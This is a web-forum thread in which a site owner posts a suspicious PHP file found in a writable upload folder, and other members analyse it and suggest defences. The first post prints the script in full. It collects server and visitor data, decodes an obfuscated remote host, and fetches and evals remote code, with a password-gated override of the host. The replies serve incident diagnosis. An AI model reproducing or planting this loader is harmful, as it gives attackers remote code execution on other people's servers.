Is this a Hacking attempt?

[Beedge]

I found a file with the following code on my server in a folder with MOD 777

I suspect it is a hacking attempt.. can anyone tell me whats going on?

Thanks~!

<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ade11da1971ab70623dbc41f2836aa7c") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{
$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);
curl_close($cu);
eval($o);
};
die(); 
?>

[rhodesa]

yeah, the code is trying to include a file from:

http://ads3.phpsearch.cn

 

and include with it a bunch of stats about your system

[Mchl]

Oh my. I just love the content of this page.

 

What is this site?

This site helps webmasters to earn money with their sites.

How it works?

Our program generate traffic from search engines and display advertising.

What shell I do to start with you ?

Signup, get php file from member area, put file into your website directory, modify or create .htaccess in the same directory, and receive money !

 

it's that easy! XD

[Beedge]

Any suggestions on any measures I could take to make my site safe from this?

[kickstart]

Hi

 

Assuming it is a dodgy site (and I wouldn't trust it) then just delete it. However you could do with knowing how it got there in the first place.

 

All the best

 

Keith

[kenrbnsn]

Another reason to turn off short tags... With short tags off, this code would never be executed...

 

Ken

[kickstart]

Hi

 

Bit more of a look and it appears that the page it goes to is http://ads3.phpsearch.cn (as mentioned by rhodesa). However if you go directly there it does a redirect elsewhere (puts /en/ on the end), unless you put a random query string on the end when it does nothing.

 

All the best

 

Keith

[rhodesa]

haha...it has a report abuse link...

[Beedge]

I think the worrying thing is how did it get on my server in the first place...?

 

and how can I prevent similar scripts saving themselves on it..

 

I have to make the folder writable because the app on the server allows users to upload files to this folder

 

any suggestions?

[kickstart]

Hi

 

How locked down are the scripts that allow users to do uploads?

 

All the best

 

Keith

[rhodesa]

well...that would be my first guess is that exploited your uploader. what does your upload code do to verify the stuff being uploaded is acceptable?

[waynew]

Post your upload code and I'm sure we'll see if it's safe or not.

Also, change your ftp details just incase.